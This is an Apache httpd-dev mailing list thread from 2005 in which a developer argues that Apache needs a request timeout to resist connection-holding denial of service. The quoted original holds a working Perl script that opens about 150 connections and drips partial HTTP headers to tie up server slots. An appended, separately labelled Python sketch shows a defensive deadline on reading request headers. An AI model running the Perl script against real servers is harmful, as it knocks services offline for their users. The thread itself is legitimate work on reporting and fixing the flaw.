httpd-dev mailing list archives

From "Ivan Barrera A." <Br...@Ivn.cl>
Subject Re: Timeout for requests
Date Tue, 03 May 2005 20:32:47 GMT
> 
> 
> How does accept filtering not 'fix' this?  If the http accept filter
> is enabled on FreeBSD, Apache will never even see those bogus requests.
> 

How about Linux? How about Windows? How about (put your favorite OS
here)?

Well.. First time I heard about httpready (which looks really nice).
I've been looking for something like this.. how come nobody mentioned it
before?

And finally, why can't Apache itself have some decent DoS-avoiding
feature? There will not always be 3rd party tools to help with that..


> 
> 
>>Rasmus Lerdorf wrote:
>>
>>
>>>Turn on accept filtering and this problem goes away.  Or at least it
>>>moves to be a kernel-level issue instead of an Apache one.
>>>
>>>-Rasmus
>>>
>>>Ivan Barrera A. wrote:
>>>
>>>
>>>
>>>>Hi...
>>>>
>>>>I'm still fighting (probably for a lost cause.. but my boss asked me to
>>>>do this).
>>>>In the socket activity there are some troubles dealing with timeouts.
>>>>It is pretty easy for anyone to DoS any Apache webserver.
>>>>I want to propose implementing a request timeout time, or at least a
>>>>check for incoming data.
>>>>
>>>>If you open many sockets to an Apache server, you can keep it alive,
>>>>and make Apache keep it open for a looong time, eating resources. If you
>>>>limit the number of connections per IP, you can still DoS Apache using
>>>>2 or more other IPs.
>>>>
>>>>All this was tested with Timeout set to 20, KeepAlive set to 5, and all
>>>>relevant options to their lowest value.
>>>>
>>>>
>>>>(one of the common scripts used to kill Apache is apache-squ1rt; I use
>>>>this other one to test)
>>>>Use this Perl script to test:
>>>>
>>>>#!/usr/bin/perl
>>>>
>>>>my $Child = 150;
>>>>my $Sleep = 10;
>>>>
>>>>use IO::Socket;
>>>>use strict;
>>>>
>>>>my($c);
>>>>my(@SOCKET);
>>>>my($t);
>>>>
>>>>local $| = 1;
>>>>
>>>>$c=0;
>>>>for(0..$Child) {
>>>> @SOCKET[$c] = new IO::Socket::INET( Proto   => "tcp",
>>>>                                           PeerAddr=> "127.0.0.1:80");
>>>> $c++;
>>>>}
>>>>
>>>>for(0..$Child) {
>>>> if ( defined @SOCKET[$c]) {
>>>>   $t = @SOCKET[$c];
>>>>   print $t "GET / HTTP/1.1";
>>>> }
>>>>}
>>>>
>>>>
>>>>while(1){
>>>> $c=0;
>>>> # For each children
>>>> for(0..$Child) {
>>>>   if ( defined @SOCKET[$c]) {
>>>>     $t = @SOCKET[$c];
>>>>     print $t "host: test.test";
>>>>   }
>>>>   $c++;
>>>> }
>>>> sleep ($Sleep);
>>>>}
>>>>
>>>>$c=0;
>>>>for(0..$Child) {
>>>> close(@SOCKET[$c++]);
>>>>}
>>>
>>>
>>>
> 
> 
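
The request timeout proposed in the quoted message differs from a per-read timeout in that it bounds the whole request head, so a peer that keeps sending a little data cannot reset the clock. The sketch below is an added example, not code from this thread or from Apache; `read_request_head`, `demo`, the limit values and the header fragments are assumptions constructed for illustration, and it runs over a local socketpair only.

```python
import socket
import threading
import time

class HeaderTimeout(Exception):
    """The request head was not completed within the configured limits."""

def read_request_head(conn, idle_timeout=2.0, total_deadline=5.0, max_bytes=8192):
    """Read up to the blank line that ends the HTTP headers, or raise.

    idle_timeout bounds each recv(); total_deadline bounds the whole head.
    """
    start = time.monotonic()
    buf = b""
    while b"\r\n\r\n" not in buf:
        remaining = total_deadline - (time.monotonic() - start)
        if remaining <= 0:
            raise HeaderTimeout("total deadline exceeded")
        if len(buf) >= max_bytes:
            raise HeaderTimeout("request head too large")
        conn.settimeout(min(idle_timeout, remaining))
        try:
            chunk = conn.recv(max_bytes - len(buf))
        except socket.timeout:
            # Whichever limit was the shorter one is the one that fired.
            why = "total deadline exceeded" if remaining <= idle_timeout else "idle timeout"
            raise HeaderTimeout(why)
        if not chunk:
            raise HeaderTimeout("peer closed before end of headers")
        buf += chunk
    return buf

def demo(fragments, gap, **limits):
    """Feed constructed header fragments over a local socketpair (no network)."""
    server, client = socket.socketpair()
    def feed():
        try:
            for frag in fragments:
                client.sendall(frag)
                time.sleep(gap)
        except OSError:
            pass  # reader already gave up and closed its end
    threading.Thread(target=feed, daemon=True).start()
    try:
        return read_request_head(server, **limits)
    except HeaderTimeout as exc:
        return str(exc)
    finally:
        server.close()
```

With only the idle limit in force, a peer that sends one fragment per interval is never cut off; the total deadline is what releases the connection slot.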
